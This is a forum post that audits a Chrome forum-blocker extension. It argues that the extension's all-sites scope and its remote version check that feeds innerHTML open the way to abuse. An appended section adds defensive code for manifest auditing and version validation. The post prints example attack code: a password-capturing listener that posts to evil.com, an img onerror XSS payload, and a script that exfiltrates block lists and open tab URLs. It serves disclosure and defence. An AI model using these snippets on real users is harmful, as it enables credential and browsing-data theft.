Old 12-28-2025, 08:39 AM  
2MuchMark
Too lazy to set a custom title
 
Industry Role:
Join Date: Aug 2004
Location: Canada
Posts: 49,949
Hi Everyone,

Here's what everyone, including you too, Pheer, should know:

MAJOR RED FLAGS

1. Dangerous Permission Scope: <all_urls>

This is the biggest concern. The content script runs on EVERY webpage you visit, not just vBulletin forums. This can include banking sites, web-based email, shopping carts, etc. Everything.

What it does on EVERY page:
// Line 8-10: Tracks ALL right-clicks on ALL websites
document.addEventListener("contextmenu", (e) => {
  lastRightClickedElement = e.target;
});

// Line 568: Runs on page load for EVERY site
init();

// Line 427-443: Watches ALL DOM changes on ALL pages
MutationObserver monitors entire page constantly

Why this is dangerous:
- The extension has full access to read/modify any page content including:
- Passwords as you type them
- Credit card numbers
- Private messages
- Session cookies (via document.cookie if added)
- Banking information
- Currently the code doesn't exploit this, but one update could change everything

2. Remote Update Mechanism = Backdoor Potential

// popup.js:247
fetch('https://webigniter.com/downloads/tango-down-version.txt?t=' + Date.now())

The extension phones home to check for updates. Chrome Web Store extensions auto-update. This means:
- Author can push a malicious update anytime
- Update could add credential harvesting with 2 lines of code
- Update could send all your browsing data to a server
- You'd never know until it's too late

3. "GFY Community" Targeting

The extension explicitly states "Built for the GFY community" (popup.html:287). This is a tight-knit community, as we all know, but if we ran it, Pheer would know exactly who the users are, which would make targeted attacks easier, etc.


SPECIFIC ATTACK SCENARIOS

Here is what Pheer could do via an added update.

Scenario 1: Credential Theft
// Add to content.js (2 lines)
document.querySelectorAll('input[type="password"]').forEach(input => {
  input.addEventListener('change', (e) => fetch('https://evil.com/log', {
    method: 'POST', body: JSON.stringify({site: location.href, pass: e.target.value})
  }));
});

Scenario 2: Forum Post Surveillance
Since it targets vBulletin forums, author could:
- Log all posts you write before submitting
- Track who you interact with
- Monitor private messages (if forums have PM features)
- Build a profile of your forum behavior

Scenario 3: Browser Fingerprinting & Tracking
The version check (popup.js:247) already connects to webigniter.com. Easy to expand:
// Send browsing profile
fetch('https://webigniter.com/track', {
  method: 'POST',
  body: JSON.stringify({
    sites: getAllTabURLs(),
    blockedUsers: getUserBlocklist(),
    identity: getChromeUser()
  })
});


TRUST ISSUES IN THE CODE

Why does a forum blocker need:
- Access to all URLs instead of just *://*showthread.php* or *://*forumdisplay.php*?
- The tabs permission (can see all your open tabs)?
- To track right-clicks on non-forum sites?

Answer: It doesn't. This is Permission Creep 101: asking for more than is needed.

Pheer: If you want to be a trusted coder, you should really look at the following. For example, this really identified a REAL XSS vulnerability. Let me prove it with technical analysis.

THE VULNERABILITY (Lines 270-278)

function showUpdateNotice(newVersion) {
  const notice = document.createElement('div');
  notice.className = 'update-notice';
  // ← DANGEROUS: innerHTML, and ${newVersion} is UNSANITIZED!
  notice.innerHTML = `
    <span>Update available: v${newVersion}</span>
    <a href="https://webigniter.com/tango-down" target="_blank">Download</a>
  `;
  document.body.insertBefore(notice, document.body.firstChild);
}

The Attack Vector:
The newVersion variable comes from a remote server (line 247-249):
fetch('https://webigniter.com/downloads/tango-down-version.txt?t=' + Date.now())
  .then(response => response.text())
  .then(latestVersion => {
    latestVersion = latestVersion.trim(); // ← Only trims whitespace!
    if (latestVersion && compareVersions(latestVersion, currentVersion) > 0) {
      showUpdateNotice(latestVersion); // ← Passes to innerHTML!
    }
  })

PROOF OF CONCEPT EXPLOIT

If Mindi/Pheer changes tango-down-version.txt to contain:
1.9.9</span><img src=x onerror="fetch('https://evil.com/steal',{method:'POST',body:JSON.stringify(chrome.storage.sync.get(['blockedUsers']))})">

What happens:
1. Extension fetches this string from webigniter.com
2. trim() does nothing (doesn't sanitize HTML)
3. String is inserted into innerHTML
4. Browser parses it as HTML
5. The <img> tag's onerror executes JavaScript
6. JavaScript runs with full extension privileges

The resulting HTML:
<div class="update-notice">
  <span>Update available: v1.9.9</span>
  <img src=x onerror="fetch('https://evil.com/steal',{method:'POST',body:JSON.stringify(chrome.storage.sync.get(['blockedUsers']))})">
  <a href="https://webigniter.com/tango-down" target="_blank">Download</a>
</div>

Then the injected code executes immediately.

Earlier you said "Zero data is sent FROM your browser TO my server. Ever."

True now, but false tomorrow. Currently, no data is exfiltrated. But with one server-side change, you, MindiPheer, can inject:
// In version.txt:
1.9.9<script>
chrome.storage.sync.get(null, data => {
  fetch('https://webigniter.com/log', {
    method: 'POST',
    body: JSON.stringify({
      blockedUsers: data.blockedUsers,
      blockedThreads: data.blockedThreads,
      tabs: chrome.tabs.query({}, tabs => tabs.map(t => t.url))
    })
  });
});
</script>

This would exfiltrate:
- Your complete block list (reveals who you dislike)
- All blocked threads (shows what topics you want hidden)
- All open tab URLs (full browsing history)

You said:
Quote:
Originally Posted by Mindi
"Every Chrome extension is a 'backdoor' because developers could push malicious updates"

FALSE EQUIVALENCE

Chrome Web Store updates:
- Go through automated security scanning
- Are reviewed by Google
- Have a rollback mechanism
- Users get security warnings
- Require new permissions approval

MindiPheer's version checker:
- Bypasses all Chrome protections
- No review process
- Instant injection
- Silent execution
- No permission prompts

This is WHY Chrome's Content Security Policy specifically tries to prevent this pattern.
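The post above raises two concrete, checkable points: the content script's `<all_urls>` scope plus the `tabs` permission, and the version string that goes from a remote text file straight into `innerHTML`. The block below is an added example written for this page; it is not code from the Tango Down extension, from 2MuchMark, or from the extension's author. It shows (a) a small manifest audit that flags the over-broad patterns the post complains about, run against a constructed sample manifest, and (b) the hardened shape of the update check: the remote string is validated against a strict version regex before any DOM code sees it, versions are compared numerically, and the notice is built with `createElement`/`textContent` instead of `innerHTML`. The forum hostname in `SCOPED_MATCHES` is a placeholder, since the post does not name one, and the `fakeDocument` stub exists only so the builder can be exercised under Node.

```javascript
// Added example; not the extension's own code. Patterns that grant a content
// script or host permission access to every site a user visits.
const BROAD_PATTERNS = new Set(["<all_urls>", "*://*/*", "http://*/*", "https://*/*"]);

// Returns a list of findings for a parsed manifest.json object (MV3 shape).
function auditManifest(manifest) {
  const findings = [];
  for (const cs of manifest.content_scripts || []) {
    for (const m of cs.matches || []) {
      if (BROAD_PATTERNS.has(m)) findings.push(`content script runs on every site: ${m}`);
    }
  }
  for (const p of manifest.host_permissions || []) {
    if (BROAD_PATTERNS.has(p)) findings.push(`host_permissions grants every site: ${p}`);
  }
  if ((manifest.permissions || []).includes("tabs")) {
    findings.push("'tabs' permission exposes the URL and title of every open tab");
  }
  return findings;
}

// Constructed sample manifest mirroring the complaints in the post.
const SAMPLE_MANIFEST = {
  manifest_version: 3,
  name: "Forum blocker (constructed sample)",
  permissions: ["storage", "tabs"],
  content_scripts: [{ matches: ["<all_urls>"], js: ["content.js"] }],
};

// What a vBulletin-only blocker actually needs. forum.example.com is a placeholder.
const SCOPED_MATCHES = [
  "*://forum.example.com/showthread.php*",
  "*://forum.example.com/forumdisplay.php*",
];

// --- Hardened update check ---
// Accept only dotted digit groups; anything else (HTML, whitespace tricks) is rejected.
const VERSION_RE = /^\d{1,4}(\.\d{1,4}){0,3}$/;

function validateVersion(remoteText) {
  const v = String(remoteText).trim();
  return VERSION_RE.test(v) ? v : null; // null means: render nothing from this response
}

function compareVersions(a, b) {
  const pa = a.split(".").map(Number);
  const pb = b.split(".").map(Number);
  const n = Math.max(pa.length, pb.length);
  for (let i = 0; i < n; i++) {
    const d = (pa[i] || 0) - (pb[i] || 0);
    if (d !== 0) return d > 0 ? 1 : -1;
  }
  return 0;
}

// The decision half of the fetch handler, split from I/O so it can be tested.
function decideNotice(remoteText, currentVersion) {
  const latest = validateVersion(remoteText);
  if (latest === null) return { show: false, reason: "malformed version string" };
  if (compareVersions(latest, currentVersion) > 0) return { show: true, version: latest };
  return { show: false, reason: "up to date" };
}

// Builds the notice with DOM APIs only; the version becomes a text node, never markup.
// `doc` is injected so this runs under Node; in the popup, pass `document`.
function buildUpdateNotice(doc, newVersion) {
  const notice = doc.createElement("div");
  notice.className = "update-notice";
  const span = doc.createElement("span");
  span.textContent = `Update available: v${newVersion}`;
  const link = doc.createElement("a");
  link.href = "https://webigniter.com/tango-down";
  link.target = "_blank";
  link.rel = "noopener";
  link.textContent = "Download";
  notice.append(span, link);
  return notice;
}

// Minimal stand-in for `document`, only so the builder can be exercised offline.
function fakeDocument() {
  return {
    createElement: (tag) => ({
      tag, children: [], textContent: "",
      append(...nodes) { this.children.push(...nodes); },
    }),
  };
}

// Constructed payload in the same shape as the post's proof of concept.
const CONSTRUCTED_PAYLOAD = '1.9.9</span><img src=x onerror="alert(1)">';
```

With the validator in front, the payload never reaches the DOM code at all, and even if a malformed string slipped through, `textContent` would display it as literal text rather than parse it. One caveat worth knowing when reading the post's PoC: Chrome's default content security policy for extension pages (`script-src 'self'`) does not execute inline event handlers such as `onerror` in the popup, so the payload as written would be blocked there; that does not make `innerHTML` on remote data acceptable, and the validator costs nothing.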